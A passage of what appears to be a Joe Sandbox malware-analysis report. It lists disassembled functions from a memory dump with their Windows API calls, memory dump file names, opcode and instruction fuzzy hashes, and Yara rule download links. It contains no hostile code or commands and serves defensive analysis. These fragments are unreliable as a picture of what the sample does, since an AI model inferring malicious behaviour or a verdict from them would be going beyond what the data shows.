                                                                                                                                                              • Instruction ID: bd7cb8753f40c03d1de7eeedb3e492252aff23a24105829c0778da8e66c0cc8d
                                                                                                                                                              • Opcode Fuzzy Hash: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
                                                                                                                                                              • Instruction Fuzzy Hash: C72100B5A00209BFDB00DFD8C845FAFBBB5FB48710F108219FA15A7284D7B19A40DBA5
                                                                                                                                                              Function 5BB43BF0 Relevance: 9.1, APIs: 6, Instructions: 57memorystringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 5BB43C00
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB43C29
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB43C48
                                                                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 5BB43C55
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB43C70
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 5BB43C7D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharGlobalMultiWide$AllocFreeKeyboardLayoutNamelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1703440718-0
                                                                                                                                                              • Opcode ID: a808f8f051319b81cd8f454bac250635642461f678f64b8cb99e98d01af297f0
                                                                                                                                                              • Instruction ID: 277953bbfa3e2fb64ebdab68ab80a5375c8f22e91708d3d33aa31a757827fadf
                                                                                                                                                              • Opcode Fuzzy Hash: a808f8f051319b81cd8f454bac250635642461f678f64b8cb99e98d01af297f0
                                                                                                                                                              • Instruction Fuzzy Hash: 0011FEB5900609BFDB00DFD8C845BBEBBB5FB48700F104219FA15A7284C6B19A40DBA5
                                                                                                                                                              Function 5BB3BBAA Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB3BBC7
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBD7
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBF4
                                                                                                                                                              • GetProfileIntA.KERNEL32(00000000,00000000,?), ref: 5BB3BC13
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3BC26
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3BC36
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastProfile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3090023961-0
                                                                                                                                                              • Opcode ID: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
                                                                                                                                                              • Instruction ID: 0cc18e00ffacb26c8ec14454df6978653983d53d37e2a9a17befb549158f8e60
                                                                                                                                                              • Opcode Fuzzy Hash: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
                                                                                                                                                              • Instruction Fuzzy Hash: D21106B5D00208EFDB21DFA4C448B9EB7B4FB04305F54C069E415AB284DBFA9A84EF55
                                                                                                                                                              Function 5BB417A8 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417C7
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417E4
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB4182E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB4183E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 871221524-0
                                                                                                                                                              • Opcode ID: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
                                                                                                                                                              • Instruction ID: 1ae71789a9cb1ea12a4241843aff322efca2ec314a3b020ee4ddd5cdfee1e37a
                                                                                                                                                              • Opcode Fuzzy Hash: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
                                                                                                                                                              • Instruction Fuzzy Hash: D121B3B6D00208EFCB04DF94D888BDEBBBABB48305F108158E915A7240D7B9DA94DF95
                                                                                                                                                              Function 5BB3A79C Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • wcslen.MSVCRT ref: 5BB3A7A6
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A7C3
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3A7E2
                                                                                                                                                              • _hwrite.KERNEL32(?,?,?), ref: 5BB3A7F7
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 5BB3A804
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocByteCharFreeMultiWide_hwritewcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 762335071-0
                                                                                                                                                              • Opcode ID: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                              • Instruction ID: b03e362f488cdfb2104fe771e046c6ed355965b0ed0093c9026cd7edc0c6cb8e
                                                                                                                                                              • Opcode Fuzzy Hash: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                              • Instruction Fuzzy Hash: 7701E1B6A00209BFDB04DFD8C845FAE77B9FB48710F108159FA15A7284D6B1AA40DB65
                                                                                                                                                              Function 5BB39FF3 Relevance: 6.1, APIs: 4, Instructions: 90memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A05E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocGlobal
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3761449716-0
                                                                                                                                                              • Opcode ID: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
                                                                                                                                                              • Instruction ID: 255683c25f877bb5b72b13642e11f88edc45d41198cb997393b3544e1fd069f6
                                                                                                                                                              • Opcode Fuzzy Hash: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
                                                                                                                                                              • Instruction Fuzzy Hash: E33160F2900608EFDB00DF94D849BEEB7B4FB48720F204219F514A7280D7B59940CBA9
                                                                                                                                                              Function 5BB3E3A8 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB3E3BE
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E3CE
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • ObjectCloseAuditAlarmA.ADVAPI32(00000000,?,?), ref: 5BB3E3ED
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3E400
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$AlarmAuditCloseErrorFreeGlobalLastObject
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 570505851-0
                                                                                                                                                              • Opcode ID: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
                                                                                                                                                              • Instruction ID: fca22863d3f99f943faca69b11e91b9c4a69742eecb687ada413b4a94e761a88
                                                                                                                                                              • Opcode Fuzzy Hash: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
                                                                                                                                                              • Instruction Fuzzy Hash: AA01ECB6901208EFDB01DFA4C948B9EBBB5FB48301F108159F905A7280D7B69B84EB65
                                                                                                                                                              Function 5BB3EBB8 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB3EBCE
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3EBDE
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 5BB3EBF9
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3EC0C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$BuildCommErrorFreeGlobalLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4064689889-0
                                                                                                                                                              • Opcode ID: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
                                                                                                                                                              • Instruction ID: 66abab8c7e1535f856746cbf6b9673e718472d6d819d40f5254c54d6cde24bf2
                                                                                                                                                              • Opcode Fuzzy Hash: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
                                                                                                                                                              • Instruction Fuzzy Hash: 01F0A9B5900208EFDB01DFA4D489BDDBBB5FB04301F508559F905AB280D7F69A84EB65
                                                                                                                                                              Function 5BB3CF9F Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB3CFB5
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3CFC5
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,?), ref: 5BB3CFE0
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3CFF3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$AttributesErrorFileFreeGlobalLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3187813303-0
                                                                                                                                                              • Opcode ID: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
                                                                                                                                                              • Instruction ID: adafb9b8c4b08c4cddb16dacd5f7d1431cc2158b52c0befcf79a861fce84e049
                                                                                                                                                              • Opcode Fuzzy Hash: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
                                                                                                                                                              • Instruction Fuzzy Hash: 19F09CB6900208EFDB00DFE4D449B9DBBB5FB08301F208159E505A7284D7B69688DB95